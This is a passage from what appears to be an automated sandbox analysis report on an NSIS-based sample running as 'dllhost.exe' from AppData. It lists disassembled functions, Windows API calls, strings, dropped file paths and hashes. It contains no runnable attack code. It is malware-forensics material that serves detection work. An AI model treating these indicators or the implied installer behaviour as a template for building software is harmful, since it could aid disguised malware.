                                                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 004045CB
                                                                              • SendMessageW.USER32(00000010,00000000,00000000), ref: 004045DD
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                              • String ID: : Completed$L)Z$N
                                                                              • API String ID: 3103080414-1128940705
                                                                              • Opcode ID: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction ID: b1457f7914280a06e64b3deddd6598f3d1f5c62ed4ca7ede05d387843edeb913
                                                                              • Opcode Fuzzy Hash: 868c1d48af680dab98623212c2c2391fab089ac2f5c5a3188426b6b277364ed0
                                                                              • Instruction Fuzzy Hash: B96173B1A00209BFDB109F60DD45EAA7B69FB94344F00813AFB05B62E0D7789952DF59
                                                                              Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                              • BeginPaint.USER32(?,?), ref: 00401047
                                                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                              • FillRect.USER32 ref: 004010E4
                                                                              • DeleteObject.GDI32(?), ref: 004010ED
                                                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                              • DrawTextW.USER32(00000000,00429200,000000FF,00000010,00000820), ref: 00401156
                                                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                              • DeleteObject.GDI32(?), ref: 00401165
                                                                              • EndPaint.USER32(?,?), ref: 0040116E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                              • String ID: F
                                                                              • API String ID: 941294808-1304234792
                                                                              • Opcode ID: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction ID: 53e7ac87f6412b54f62e8112edad18e9e8f6d31619aee210d26213a62ff7d26c
                                                                              • Opcode Fuzzy Hash: dddf6588841e3707deee37d13ddb8de347a630f4291ad0a352021d00e496f588
                                                                              • Instruction Fuzzy Hash: 88418A71800209AFCF058FA5DE459AF7BB9FF44310F00842AF991AA1A0C738D955DFA4
                                                                              Function 00405E98 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00405ED3
                                                                              • GetShortPathNameW.KERNEL32(?,00426D88,00000400,?,?,00406033,?,?), ref: 00405EDC
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CB3
                                                                                • Part of subcall function 00405CA3: lstrlenA.KERNEL32(00000000,?,00000000,00405F8C,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405CE5
                                                                              • GetShortPathNameW.KERNEL32(?,00427588,00000400,?,00000000,?,?,00406033,?,?), ref: 00405EF9
                                                                              • wsprintfA.USER32 ref: 00405F17
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00427588,C0000000,00000004,00427588,?,?,?,?,?), ref: 00405F52
                                                                              • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405F61
                                                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405F99
                                                                              • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,00426988,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00405FEF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 00406000
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00406007
                                                                                • Part of subcall function 00405D3E: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\AppData\Roaming\dllhost.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D42
                                                                                • Part of subcall function 00405D3E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D64
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                              • String ID: %ls=%ls$[Rename]
                                                                              • API String ID: 2171350718-461813615
                                                                              • Opcode ID: 8c66691bf4a5e84a4fbdc256dda6f1198a80262718252d540a2d4584cf418829
                                                                              • Instruction ID: 4a393c650f5efb56d04c3c3372b5421d1ec1fa5455b413989d263a6ec4772352
                                                                              • Opcode Fuzzy Hash: 8c66691bf4a5e84a4fbdc256dda6f1198a80262718252d540a2d4584cf418829
                                                                              • Instruction Fuzzy Hash: 9E316870240B19BBD220ABA59E48F6B3A5CDF41758F15003BF946F72C2DA7CD8118ABD
                                                                              Function 004047DE Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 183stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoTaskMemFree.OLE32 ref: 004047E5
                                                                                • Part of subcall function 00405B1D: lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040332A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,7570D4C4,00403589,?,00000006,00000008,0000000A), ref: 00405B23
                                                                                • Part of subcall function 00405B1D: CharPrevW.USER32(?,00000000), ref: 00405B2D
                                                                                • Part of subcall function 00405B1D: lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B3F
                                                                              • lstrcmpiW.KERNEL32(: Completed,?,00000000,?), ref: 00404817
                                                                              • lstrcatW.KERNEL32(?,: Completed,?,00000000,?), ref: 00404823
                                                                              • SetDlgItemTextW.USER32(?,000003FB), ref: 00404835
                                                                              • GetDiskFreeSpaceW.KERNEL32(004216B8,?,?,0000040F,?,004216B8,004216B8,?,00000001,004216B8,?,?,000003FB,?,?,000003FB), ref: 004048F8
                                                                              • MulDiv.KERNEL32 ref: 00404913
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Freelstrcat$CharDiskItemPrevSpaceTaskTextlstrcmpilstrlen
                                                                              • String ID: : Completed$C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea
                                                                              • API String ID: 611778071-2084225728
                                                                              • Opcode ID: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
                                                                              • Instruction ID: 0d4a6a07d32540202bd103048eaebc2e62f3dbef9356839362eadbdc3d2543bd
                                                                              • Opcode Fuzzy Hash: 1fa5789cdcb1e2cd980dcc05ec4352f4ddb055ac1aa6b3b5aaf3b34fcfb88657
                                                                              • Instruction Fuzzy Hash: 6A5191F1A00209ABDB11AFA5CD45AAF76B8EF84315F10847BF601B62D1D73C9A418B6D
                                                                              Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145stringtimeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • lstrcatW.KERNEL32(00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,?,00000031), ref: 004017B0
                                                                              • CompareFileTime.KERNEL32(-00000014,?,Noncyclical,Noncyclical,00000000,00000000,Noncyclical,C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea,?,?,00000031), ref: 004017D5
                                                                                • Part of subcall function 0040624C: lstrcpynW.KERNEL32(?,?,00000400,0040340E,00429200,NSIS Error,?,00000006,00000008,0000000A), ref: 00406259
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 004052E8
                                                                                • Part of subcall function 004052B0: lstrlenW.KERNEL32(00403233,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 004052F8
                                                                                • Part of subcall function 004052B0: lstrcatW.KERNEL32(Completed,00403233,00403233,Completed,00000000,005A5ADC,00403094), ref: 0040530B
                                                                                • Part of subcall function 004052B0: SetWindowTextW.USER32(Completed,Completed,00000000,005A5ADC,00403094,?,?,?,?,?,?,?,?,?,00403233), ref: 0040531D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405343
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040535D
                                                                                • Part of subcall function 004052B0: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040536B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                              • String ID: C:\Users\user\AppData\Roaming\intercessionate\Favourablies117\sulfonylurea$C:\Windows\Intragantes.geo$Noncyclical$sarcoderma
                                                                              • API String ID: 1941528284-1377868196
                                                                              • Opcode ID: badfc4f3729e7ae1c04d617a928de9c9f468a07c86b09933b1868ed5e72df1f0
                                                                              • Instruction ID: a770c97b6a534c03b62b220807ae8b4c56d0338f794e1485d955ae8f7948b73c
                                                                              • Opcode Fuzzy Hash: badfc4f3729e7ae1c04d617a928de9c9f468a07c86b09933b1868ed5e72df1f0
                                                                              • Instruction Fuzzy Hash: 69419331900519BECF117BB5CD45DAF3A79EF45329B20827FF412B11E2CA3C8A619A6D
                                                                              Function 004064E0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Char$Next$Prev
                                                                              • String ID: "C:\Users\user\AppData\Roaming\dllhost.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 589700163-3050598723
                                                                              • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction ID: 6610343985016d4d3861ed5752e28572e14021042ee5aa5e44fa789d85a72fac
                                                                              • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                                              • Instruction Fuzzy Hash: 0811B255800612A5DB303B14AD40AB7A2B8EF58794F52403FED9AB32C5E77C9C9286BD
                                                                              Function 00404248 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EB), ref: 00404265
                                                                              • GetSysColor.USER32(00000000,?), ref: 00404281
                                                                              • SetTextColor.GDI32(?,00000000), ref: 0040428D
                                                                              • SetBkMode.GDI32(?,?), ref: 00404299
                                                                              • GetSysColor.USER32(?), ref: 004042AC
                                                                              • SetBkColor.GDI32(?,?), ref: 004042BC
                                                                              • DeleteObject.GDI32(?), ref: 004042D6
                                                                              • CreateBrushIndirect.GDI32(?), ref: 004042E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                              • String ID:
                                                                              • API String ID: 2320649405-0
                                                                              • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction ID: 35b1f235034bf6ed7bc4b251198a1cd7c2be2f7e10ce7e0bcb7d9fbd5291f4f5
                                                                              • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                                              • Instruction Fuzzy Hash: D7218471600704AFCB219F68DE08B4BBBF8AF41750B04897EFD95E26A0D734D904CB64
                                                                              Function 00402644 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 153fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B0
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 004026EB
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 0040270E
                                                                              • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 00402724
                                                                                • Part of subcall function 00405E1F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E35
                                                                              • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 004027D0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                              • String ID: 9
                                                                              • API String ID: 163830602-2366072709
                                                                              • Opcode ID: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction ID: e157cda522c6117da55a2477cd969df60feaafed97a1adf3b1f02a042ae2ebc2
                                                                              • Opcode Fuzzy Hash: efe543eef621af3ce3e1f10678013b5d314bdbd7c9d0a35879e6d8519b0983c6
                                                                              • Instruction Fuzzy Hash: 9C51F774D10219ABDF20DFA5DA88AAEB779FF04304F50443BE511B72D1D7B89982CB58
                                                                              Function 00404B7A Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404B95
                                                                              • GetMessagePos.USER32 ref: 00404B9D
                                                                              • ScreenToClient.USER32(?,?), ref: 00404BB7
                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BC9
                                                                              • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404BEF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000017.00000002.487603088.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000017.00000002.487158380.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487620969.0000000000408000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000418000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000422000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000427000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042C000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.000000000042F000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000435000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.487716282.0000000000459000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000045C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.000000000046F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              • Associated: 00000017.00000002.489722095.00000000004A3000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                              Similarity
                                                                              • API ID: Message$Send$ClientScreen
                                                                              • String ID: f
                                                                              • API String ID: 41195575-1993550816
                                                                              • Opcode ID: e2d2d6aa42d138b4bf43a857dc2fb8cfa63f2fbdf5f441295addbf44c9bf4daa
                                                                              • Instruction ID: 6d27a89fd112f7dd13df74400405474d9978eabb633620400ae5318118f47dfb
